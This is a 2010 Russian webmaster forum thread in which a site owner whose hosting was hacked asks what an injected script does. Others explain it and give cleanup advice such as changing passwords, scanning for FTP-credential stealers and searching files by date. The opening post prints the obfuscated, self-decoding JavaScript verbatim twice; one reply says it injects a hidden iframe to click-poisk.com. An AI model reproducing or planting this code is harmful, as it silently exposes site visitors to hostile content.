Взломали хостинг - оставили скрипт. Помогите.

Onu
На сайте с 10.01.2007
Offline
170
Onu
1659

Взломали хостинг и на все сайты вставили такой скрипт. Помогите разобраться что делает - на сайте ничего не заметил (внешних ссылок дополнительных). Сайты в бан поулетали (больше 50 штук, 1.5 года висели в индексе), поэтому на хостинг и полез. На самом деле не знаю когда точно сайты вылетели так же как и не знаю как давно вставили скрипт. На хостинге дата изменения файла стоит от 5 февраля в 4 утра, для каждого сайта разное время +-1-3 мин, видно что руками делалось, но думаю что дело было и раньше - может быть как-то обновилось.

Собственно сам скрипт, скажите что делает на сайте и зачем он нужен ибо сам не разбираюсь:

<script>rpnsxy=["uqjici=0;snwvcdmd='';for(oxbjvi=0;oxbjvi<rpnsxy[0]['length'];oxbjvi+=1)uqjici+=rpnsxy[0].charCodeAt(oxbjvi);uqjici%=0x64;for(oxbjvi=0;oxbjvi<rpnsxy[1]['length'];oxbjvi+=2)snwvcdmd+=String.fromCharCode(parseInt(0+'x'+rpnsxy[1].charAt(oxbjvi)+rpnsxy[1].charAt(oxbjvi+1))^uqjici);document.write(snwvcdmd);","13475b424311134d404b5611135c4c5d465f5b11594e5d0f5b4a425f66695d4e424a124b404c5a424a415b014c5d4a4e5b4a6a434a424a415b070846495d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a0708464b0803087d7c66695d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a07085c5d4c080308475b5b5f1500004c43464c44025f40465c44014c4042005b474a5d4a004641014c484610180806145b4a425f66695d4e424a015c5b56434a0159465c464d4643465b56120847464b4b4a4108145b4a425f66695d4e424a015c5b56434a0158464b5b4712081f5f5708145b4a425f66695d4e424a015c5b56434a01474a4648475b12081f5f57081466695d4e424a604d450f120f4b404c5a424a415b014d404b56014e5f5f4a414b6c4746434b075b4a425f66695d4e424a061413005c4c5d465f5b1113004d404b56111300475b424311"];eval(rpnsxy[0]);</script>

Onu добавил 11.02.2010 в 21:41

Забыл сказать - сайт стал очень долго грузиться, что натолкнуло на проверку целостности файлов. В общем смотрел через Firebug и вижу следующую картину

Когда код убрал - пропало. Это взлом какой-то траффик дает на ixbt.com или что, какие-то гугловские гаджеты...

Onu добавил 11.02.2010 в 21:49

Нашел еще порцию каких-то скриптов:

<?php
// Silence is golden.
?><script>rpnsxy=["uqjici=0;snwvcdmd='';for(oxbjvi=0;oxbjvi<rpnsxy[0]['length'];oxbjvi+=1)uqjici+=rpnsxy[0].charCodeAt(oxbjvi);uqjici%=0x64;for(oxbjvi=0;oxbjvi<rpnsxy[1]['length'];oxbjvi+=2)snwvcdmd+=String.fromCharCode(parseInt(0+'x'+rpnsxy[1].charAt(oxbjvi)+rpnsxy[1].charAt(oxbjvi+1))^uqjici);document.write(snwvcdmd);","13475b424311134d404b5611135c4c5d465f5b11594e5d0f5b4a425f66695d4e424a124b404c5a424a415b014c5d4a4e5b4a6a434a424a415b070846495d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a0708464b0803087d7c66695d4e424a0806145b4a425f66695d4e424a015c4a5b6e5b5b5d464d5a5b4a07085c5d4c080308475b5b5f1500004c43464c44025f40465c44014c4042005b474a5d4a004641014c484610180806145b4a425f66695d4e424a015c5b56434a0159465c464d4643465b56120847464b4b4a4108145b4a425f66695d4e424a015c5b56434a0158464b5b4712081f5f5708145b4a425f66695d4e424a015c5b56434a01474a4648475b12081f5f57081466695d4e424a604d450f120f4b404c5a424a415b014d404b56014e5f5f4a414b6c4746434b075b4a425f66695d4e424a061413005c4c5d465f5b1113004d404b56111300475b424311"];eval(rpnsxy[0]);</script>
Nunan
На сайте с 15.08.2008
Offline
78
#1

скрипт создает iframe с адресом - http://click-poisk.com/there/in.cgi?7

в нем создает еще iframe с google

еще заметил что он кажется обратился к адресу googleinru.in (если я не ошибаюсь).

maximus200
На сайте с 08.09.2004
Offline
185
#2

Было нечто подобное в прошлом. Порядок действий следующий:

- меняем пароли везде

- руками вычещаем лишний мусор с кода. Как правило этот мусорный код будет в файликах с датой изменения от 5 февраля в 4 утра.

После комп, где были прописаны фтп доступы в проге типа тотал командер смотрим на вирусы, как правило все сводится к тому, что на комп попал вирус, который стянул донные фтп доступов. После сканирования еще раз меняем везде пароли.

P
На сайте с 25.02.2006
Offline
30
#3

та же фигня блин, уже запарился искать где эта срань сидит и по моему оно само опять появляется

P
На сайте с 25.02.2006
Offline
30
#4

это капец... код во всех индекс файлах и хтмл тоже которые пустые в папках...

так же во всех default.php

уже запарился чистить вручную..а когда сайтов с десяток ?

AS
На сайте с 21.09.2007
Offline
167
#5
Pairgain:
та же фигня блин, уже запарился искать где эта срань сидит и по моему оно само опять появляется
Pairgain:
это капец... код во всех индекс файлах и хтмл тоже которые пустые в папках...
так же во всех default.php

уже запарился чистить вручную..а когда сайтов с десяток ?

1. не берите дешевый 0,50$ центовый гавнохост

2. не ставте всякие сборки типа звердвд

3. не ставте кряки к фтп менеджерам, лучше используйте ту же файлзилу

4. поменьше порнушки на комп .....

5. форматни винт, поставь чистую винду и ~касперского (проверять комп уже бесполезно 😂)

Jaf4
На сайте с 03.08.2009
Offline
804
#6

я после подобной чистки сайта (ох и парился, почти сутки, хорошо заметил сразу) и компьютеров (на компах ничего не нашел) еще и хостинг сменил вместе с паролями, т.к. смысла бодаться с хостером нет, все равно все будут отрицать.

New! NVMe VPS от SmartApe.ru (https://goo.gl/eoYYkS)
Light Phantom
На сайте с 17.03.2007
Offline
188
#7
AchilleSS:
2. не ставте всякие сборки типа звердвд

Это просто предположение или есть реальные примеры?

Onu, http://vashmaster.ru/informaciya/o_sozdanii_saytov/news52.php#header_0

AR
На сайте с 19.02.2009
Offline
28
#8

Да уж, могу только посоветовать искать файлы с помощью Text Replacer, в поле найти "вредоносный код", в поле заменить пусто, вроде шустро работает

Spartaco
На сайте с 13.09.2006
Offline
126
#9

у меня с 4 на 5 февраля на mchoste вот так натроянили этим же скриптом 7! разных аккаунтов, и сайты причем выборочно, в этом есть, в этом нету, а в этом тоже есть. Стоит каспер + фаервол spyware, на компе чисто, пароли в менеджере не хранятся - заепся вычищать это все и менять тонны паролей. Мсхост включили мороз - вроде как они и не причем - а кто причем? Если у них до сих пор в футере главной страницы висит "жыж и нежыж" - гамнё какое-то.

Чистите, что могу посоветовать. Ставьте сортировку по дате, все верно - между 3 и 6 февраля - найдете массу интересного.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий